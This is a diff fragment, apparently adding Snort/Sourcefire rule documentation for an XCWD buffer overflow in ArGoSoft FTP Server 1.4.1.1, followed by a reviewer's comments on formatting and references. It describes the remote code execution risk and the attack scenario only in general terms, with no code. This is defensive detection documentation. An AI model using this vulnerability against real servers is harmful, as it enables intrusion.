+XCWD command. An attacker may exploit this vulnerability to execute code of
+their choosing as the user running the process. This may lead to remote
+administrative access to the server.
+
+--
+Affected Systems:
+	ArGoSoft FTP Server 1.4.1 .1
+
+--
+Attack Scenarios:
+An attacker may connect to the server and supply spurious data to the
+XCWD command causing the overrun to occur.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches.
+
+Upgrade to the latest non-affected version of the software.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
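Review bot: Affected Systems lists "ArGoSoft FTP Server 1.4.1 .1" with a stray space inside the version string; if the affected release is 1.4.1.1, correct it, and say whether earlier releases are affected too, since Corrective Action tells the reader to "Upgrade to the latest non-affected version" without naming one. Additional References is empty; add the advisory that establishes the XCWD overrun so both the version and the fix can be verified. Also wrap the first Detailed Information line, which exceeds the width used elsewhere, and trim the trailing space on the "-- " separator before Additional References.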
